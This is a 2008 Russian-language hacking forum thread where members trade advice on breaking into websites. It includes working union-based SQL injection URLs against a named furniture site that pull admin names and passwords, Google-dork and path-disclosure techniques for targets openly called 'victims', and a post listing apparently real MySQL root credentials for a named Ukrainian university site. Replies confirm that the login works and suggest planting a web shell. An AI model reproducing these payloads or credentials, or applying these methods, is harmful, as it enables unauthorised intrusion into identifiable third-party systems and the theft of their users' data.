Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    masternet, можешь поискать ошибки на сайте, обычно в них можно найти. А так сканером вполне вероятно узнать...
     
  2. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Найти раскрытие путей, правда если включен вывод ошибок
     
  3. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Можно узнать, вызвав какую-нибудь ошибку в скрипте(через скуль, инклуд)
     
    1 person likes this.
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Зачем уж сразу скуль, инсклуд \ etc) хватит и к примеру md5($_POST['passwd']), &passwd[]=asd
     
  5. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    да не..чз скуль как узнать полный путь к корню сайта?
    load_file('/') не катит(
     
    #4085 masternet, 13 Dec 2008
    Last edited: 13 Dec 2008
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    если ты про тот же сайт, про который меня вчера в ЛС долбил, то просто удали из запроса например номер последней колонки - будет ошибка и покажет полный путь
     
  7. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Если только File_priv Y ....(то есть можешь прочитать допустим /etc/passwd) ...Найти конфиги апача.....
    Ну или из ошибок(если там конечно будет показан полный путь..)
     
  8. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    если ошибок совсем нет, иногда переменные @@basedir и @@datadir позволяют угадать путь)
     
  9. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Часто бывает, что в корне сайта валяется пхпинфо с именем типа phpinfo.php, info.php, test.php и т.д.
     
    2 people like this.
  10. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    можно через гугль ошибки поискать...
    site:jertva.com Warning
    если гугл ошибок не помнит, то идем на
    Code:
     madnet.name/tools/madss/
    вбиваем имя сайта и смотрим, хостятся ли рядом какие-либо сайты... если да, то поочерёдно вбиваем в гугль
    site:sait_ryadom_s_jertvoi.com Warning

    P.S
    кроме Warning, можно и по другим кеям поискать, Error, "failed to open stream"...
     
    #4090 Iceangel_, 13 Dec 2008
    Last edited: 13 Dec 2008
    2 people like this.
  11. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    Code:
    http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+column_name+from+information_schema.columns+where+table_name=0x61736d5f61646d696e+limit+2,1--
    почему сам учётки не высвечиваются?
     
  12. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Ну наверное чтобы узнать учётки надо вот такой запрос сделать
    Code:
    http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+concat_ws(0x40,name,password)+from+asm_admin+limit+0,1--
    А то что ты выше написал-этим мы всего лишь узнаем какие колонки в таблице asm_admin
     
  13. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    Отлично) спс огромное!

    подскажите что ещё за хэш ?
    5096c350535026dc
     
  14. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    Далеко не факт, просто вероятно пароль не хранится в бд... А находиться он может где угодно. Я встречал, даже когда авторизация с данными для входа была вшита в сам скрипт(запароленый), к которому мы обращаемся
     
  15. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    phpMyAdmin редиректит

    Есть сайт bridge.tane.edu.ua, есть пароль на рута
    Code:
      $DATABASENAME = "stud_test";
      $DATABASESERVER = "localhost";
      $DATABASEUSER = "root";
      $DATABASEPASS = "steppenW";
    Есть майадмин: bridge.tane.edu.ua/phpmyadmin/
    Сервер запущен на 192.168.101.18, и постоянно туда редиректит, если заходить через майадмин.
    Как нормально поюзать багу?
     
  16. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Подскажите, каким образом можно просмотреть имена таблиц и колонок при SQL-инъекции другой базы данных, находящейся на этом же аккаунте?
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Thrasher88
    column_name+from+information_schema.columns+where+table_schema='база'+and+table_name='таблица'
     
  18. serfertty

    serfertty Guest

    Reputations:
    0
    Он не редиректит просто либо серв мускула на другом серваке,либо на этом же,тогда надо лить шелл.
     
  19. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Goudini
    Да всё нормально юзается. Заходит в майадмин с этими данными норм, как root@sectorgaza =)
    Что конкретно тебе нужно?
     
  20. Astrit

    Astrit New Member

    Joined:
    12 Dec 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток!
    Я тут недавно начал изучать SQL inj . читал статьи и.т.д

    1)Нашел уязвимость подставив кавычку
    (выдалась ошибка )
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''100''' at line 6
    2)Начал искать кол-во полей подобрал вручную около 50 (потом устал :) ),
    но на 20 аргументе у меня выдалось не то что всегдда выдавалось
    (от 1 до 19 и от 21 до 50),я решил что строк 20....

    3)Решил подставить VERSION() USER()..итд
    получил ответы:
    DB: tmhoxc76
    Usr: tmhoxc76@*ipsite*
    Ver: 4.1.22-max-log

    вобщем вопросик:
    даж не знаю как сказать....
    вобщем все запросы котрые я делал отображались
    не в теле сайта,а шли вместо замены ссылки,но выводились правильно как я понял....
    так вот как мне тееперь извлечь данные из таблицы? :confused: :confused: :confused:

    ПыСы: ссорь hack.lang=2
     
Thread Status:
Not open for further replies.